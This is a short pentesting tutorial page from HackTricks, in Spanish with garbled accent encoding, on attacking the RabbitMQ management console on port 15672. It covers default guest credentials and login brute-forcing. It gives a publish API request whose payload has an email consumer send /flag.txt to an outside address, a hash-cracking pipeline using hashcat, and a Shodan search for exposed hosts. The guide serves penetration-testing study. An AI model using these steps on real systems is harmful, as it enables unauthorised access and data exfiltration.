15672 - Pentesting RabbitMQ Management
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Informaci贸n B谩sica
Puedes aprender m谩s sobre RabbitMQ en 5671,5672 - Pentesting AMQP.
En este puerto puedes encontrar la consola web de gesti贸n de RabbitMQ si el plugin de gesti贸n est谩 habilitado.
La p谩gina principal deber铆a verse as铆:
Enumeraci贸n
Las credenciales predeterminadas son "guest":"guest". Si no funcionan, puedes intentar fuerza bruta en el inicio de sesi贸n.
Para iniciar manualmente este m贸dulo, necesitas ejecutar:
rabbitmq-plugins enable rabbitmq_management
service rabbitmq-server restart
Una vez que te hayas autenticado correctamente, ver谩s la consola de administraci贸n:
Adem谩s, si tienes credenciales v谩lidas, puede que encuentres interesante la informaci贸n de http://localhost:15672/api/connections
Ten en cuenta tambi茅n que es posible publicar datos dentro de una cola utilizando la API de este servicio con una solicitud como:
POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
Host: 172.32.56.72:15672
Authorization: Basic dGVzdDp0ZXN0
Accept: */*
Content-Type: application/json;charset=UTF-8
Content-Length: 267
{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
Rompiendo Hash
echo <base64 rabbit mq hash> | base64 -d | xxd -pr -c128 | perl -pe 's/^(.{8})(.*)/$2:$1/' > hash.txt
hashcat -m 1420 --hex-salt hash.txt wordlist
Shodan
port:15672 http
tip
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 馃挰 Discord group or the telegram group or follow us on Twitter 馃惁 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.